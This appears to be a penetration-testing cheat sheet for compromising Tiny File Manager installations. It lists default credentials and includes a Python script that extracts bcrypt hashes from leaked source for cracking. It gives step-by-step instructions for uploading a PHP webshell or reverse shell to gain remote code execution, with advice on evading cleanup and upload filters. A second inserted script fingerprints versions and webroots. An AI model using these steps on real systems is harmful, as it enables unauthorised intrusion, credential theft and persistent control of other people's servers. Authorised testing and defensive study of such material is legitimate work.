
Tiny File Manager

H3K Tiny File Manager - single-file, PHP-based web file manager (tinyfilemanager.php) with its own login, file browser, editor and drag-and-drop upload.

Common Path: /tiny/ or /tinyfilemanager.php


Discovery

# Directory brute-force
feroxbuster -u http://TARGET -w /usr/share/seclists/Discovery/Web-Content/common.txt

# Look for
/tiny/
/tiny/tinyfilemanager.php
/tinyfilemanager.php
/filemanager/

# Fingerprint: the login page title is "H3K | Tiny File Manager" and the login form posts fm_usr / fm_pwd

Default Credentials

  Username    Password
  admin       admin@123
  user        12345

Both accounts ship in the stock config. user is listed in $readonly_users by default (browse only, no upload), so log in as admin when the goal is upload. The plaintexts only work if the operator never replaced the bcrypt hashes in $auth_users.

Nuclei template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/tiny-file-manager-default-login.yaml


Credential Hashes (from source)

If you can read the PHP source code (LFI, backup copy, exposed .git, etc.), look for:

  • $use_auth: false means the manager is open with no login at all

  • $auth_users: the username => hash array; values are password_hash() output (bcrypt, $2y$10$...), which cracks offline in hashcat's bcrypt mode

  • $readonly_users: accounts that can browse but not upload or edit
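Added example (not part of these notes or of the Tiny File Manager project): a standard-library-only Python helper that pulls $use_auth, $auth_users and $readonly_users out of a readable copy of tinyfilemanager.php and writes the bcrypt hashes in user:hash form for hashcat. The embedded PHP snippet is a constructed sample; its two hash strings are placeholders in bcrypt format, not hashes of any real password. The array-parsing regexes assume the quoting style the project uses (single-quoted keys and values) and are an assumption.

```python
"""Extract Tiny File Manager credentials from a leaked tinyfilemanager.php."""
import re
import sys

# Constructed sample of the config block at the top of tinyfilemanager.php.
# The hash values are placeholders with a valid bcrypt shape, NOT real hashes.
SAMPLE_PHP_SOURCE = r"""<?php
$use_auth = true;
$auth_users = array(
    'admin' => '$2y$10$ConstructedSaltXXXXXXXNotARealHashValueForDemo1234567',
    'user' => '$2y$10$AnotherConstructedSaltXXXAlsoNotARealHashValue1234567',
);
$readonly_users = array('user');
"""

# Modular-crypt bcrypt: $2a/$2b/$2x/$2y, 2-digit cost, 22-char salt + 31-char digest
BCRYPT_RE = re.compile(r'\$2[abxy]\$\d{2}\$[./A-Za-z0-9]{53}')


def _php_array_body(php_source, var_name):
    """Return the text between array( ... ) or [ ... ] assigned to $var_name, or None."""
    pattern = r'\$' + var_name + r'\s*=\s*(?:array\s*\(|\[)(.*?)(?:\)|\])\s*;'
    m = re.search(pattern, php_source, re.S)
    return m.group(1) if m else None


def auth_enabled(php_source):
    """$use_auth = false means no login is required; the project default is true."""
    m = re.search(r'\$use_auth\s*=\s*(true|false)\s*;', php_source)
    return m is None or m.group(1) == 'true'


def extract_auth_users(php_source):
    """Map username -> stored hash from the $auth_users array (assumed single-quoted)."""
    body = _php_array_body(php_source, 'auth_users')
    if body is None:
        return {}
    return dict(re.findall(r"'([^']+)'\s*=>\s*'([^']+)'", body))


def extract_readonly_users(php_source):
    """Usernames that can browse but not upload, from $readonly_users."""
    body = _php_array_body(php_source, 'readonly_users')
    return re.findall(r"'([^']+)'", body) if body else []


def hashcat_lines(users):
    """user:hash lines for bcrypt mode (-m 3200 with --username); skip non-bcrypt values."""
    return [f'{user}:{h}' for user, h in users.items() if BCRYPT_RE.fullmatch(h)]


if __name__ == '__main__':
    # usage: python3 tfm_hashes.py /path/to/tinyfilemanager.php > hashes.txt
    src = open(sys.argv[1], encoding='utf-8', errors='replace').read() if len(sys.argv) > 1 else SAMPLE_PHP_SOURCE
    if not auth_enabled(src):
        print('# $use_auth is false: no login required', file=sys.stderr)
    ro = set(extract_readonly_users(src))
    for line in hashcat_lines(extract_auth_users(src)):
        user = line.split(':', 1)[0]
        print(f'# {user} is read-only' if user in ro else f'# {user} can upload', file=sys.stderr)
        print(line)
```

Feed the output to hashcat -m 3200 --username hashes.txt wordlist; bcrypt at cost 10 is slow, so try the two stock passwords and a small targeted list before anything larger.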


File Upload RCE

After login (as admin: the default user account is in $readonly_users and cannot upload):

  1. Navigate to a writable directory (often /tiny/uploads/)

  2. Upload a PHP webshell with the Upload button (a Dropzone form that POSTs the file to the current ?p= path)

Simple backdoor: Kali's /usr/share/webshells/php/simple-backdoor.php, which passes the cmd parameter to system().

Access: http://TARGET/tiny/uploads/simple-backdoor.php?cmd=id

Full reverse shell: /usr/share/webshells/php/php-reverse-shell.php with $ip and $port set to your listener; start the listener before browsing to the uploaded file.


Path Disclosure

Opening a file through the manager's view action shows its metadata, including the absolute filesystem path:

Displays: Full path: /var/www/html/tiny/uploads/<file> (example; the real document root varies per host)

Use it to map URL paths to disk paths: it tells you where your uploads land and which directory a shell should write to.


Writable Directories

  • Check /tiny/uploads/ - often writable

  • Error message "specified folder isn't available for writing" = try subdirectories

  • Use "New Folder" feature to find writable locations


Version Detection

Look in the source for define('VERSION', '...') near the top of tinyfilemanager.php, or check the version string in the page footer and HTML title.

Common vulnerable versions: 2.4.6 and earlier, which carry published upload and path-traversal CVEs (e.g. CVE-2021-45010). With valid credentials the upload of .php files works on any version unless $allowed_upload_extensions restricts it, so the version matters less than the login.
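Added example covering both the Path Disclosure and Version Detection sections (not code from these notes or from the project): a standard-library-only Python helper that pulls the disclosed full path and the version string out of a saved page or source file, maps the path back to the document root, and flags the 2.4.6-and-earlier releases. The two embedded inputs are constructed samples; the exact markup around "Full path:" and the footer version string differs between releases, so the regexes are deliberately loose and are an assumption.

```python
"""Fingerprint a Tiny File Manager instance from a saved view page or its PHP source."""
import re
import sys

# Constructed sample of a file-view page (markup approximated, not copied from the project).
SAMPLE_VIEW_PAGE = """<div class="card-body">
<p class="break-word"><b>File:</b> shell.php<br>
<b>Full path:</b> /var/www/html/tiny/uploads/shell.php<br>
<b>File size:</b> 42 bytes</p></div>
<footer>Tiny File Manager 2.4.7</footer>"""

# Constructed sample of the top of a readable tinyfilemanager.php.
SAMPLE_SOURCE = "<?php\ndefine('VERSION', '2.4.6');\n$use_auth = true;\n"


def extract_full_path(html):
    """Text after 'Full path:', skipping any tags that sit between the label and the value."""
    m = re.search(r'Full path:\s*(?:</?\w+[^>]*>\s*)*([^<\r\n]+)', html)
    return m.group(1).strip() if m else None


def extract_version(text):
    """Version from define('VERSION', ...) in source, else from 'Tiny File Manager x.y.z' in HTML."""
    m = (re.search(r"define\(\s*'VERSION'\s*,\s*'(\d+(?:\.\d+)+)'", text)
         or re.search(r'Tiny File Manager\s*v?(\d+(?:\.\d+)+)', text))
    return m.group(1) if m else None


def version_tuple(version):
    return tuple(int(part) for part in version.split('.'))


def has_known_upload_cves(version):
    """2.4.6 and earlier carry published upload/path-traversal CVEs (e.g. CVE-2021-45010)."""
    return version_tuple(version) <= (2, 4, 6)


def webroot_from_full_path(full_path, url_path):
    """Strip the URL path off the disclosed filesystem path to recover the document root."""
    url_path = url_path.strip('/')
    if full_path.endswith('/' + url_path):
        return full_path[:-len(url_path) - 1]
    return None  # the manager is served from a directory that is not under the web root


def fingerprint(text, url_path=None):
    """Everything worth noting from one saved page/source, as a dict."""
    version = extract_version(text)
    full_path = extract_full_path(text)
    return {
        'version': version,
        'known_cves': has_known_upload_cves(version) if version else None,
        'full_path': full_path,
        'webroot': webroot_from_full_path(full_path, url_path) if full_path and url_path else None,
    }


if __name__ == '__main__':
    # usage: python3 tfm_fingerprint.py saved_page.html [/tiny/uploads/shell.php]
    text = open(sys.argv[1], encoding='utf-8', errors='replace').read() if len(sys.argv) > 1 else SAMPLE_VIEW_PAGE
    url_path = sys.argv[2] if len(sys.argv) > 2 else '/tiny/uploads/shell.php'
    for key, value in fingerprint(text, url_path).items():
        print(f'{key}: {value}')
```

The webroot value is what you need when the disclosed path and the URL disagree (for example an uploads/ directory outside the web root, which explains a shell that uploads fine but returns 404).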


Notes

  • Uploads may be cleaned periodically by cron: if simple-backdoor.php disappears, upload and trigger a reverse shell instead; once it is running, deleting the file does not kill the shell process

  • Check for .htaccess restrictions on uploaded files (php_flag engine off, or a FilesMatch block denying .php): if PHP is not executed from uploads/, use another writable directory, or try an alternative extension such as .phtml if the server maps it to PHP

  • Check $allowed_upload_extensions in the config: empty (the default) allows any extension, otherwise only the listed ones are accepted
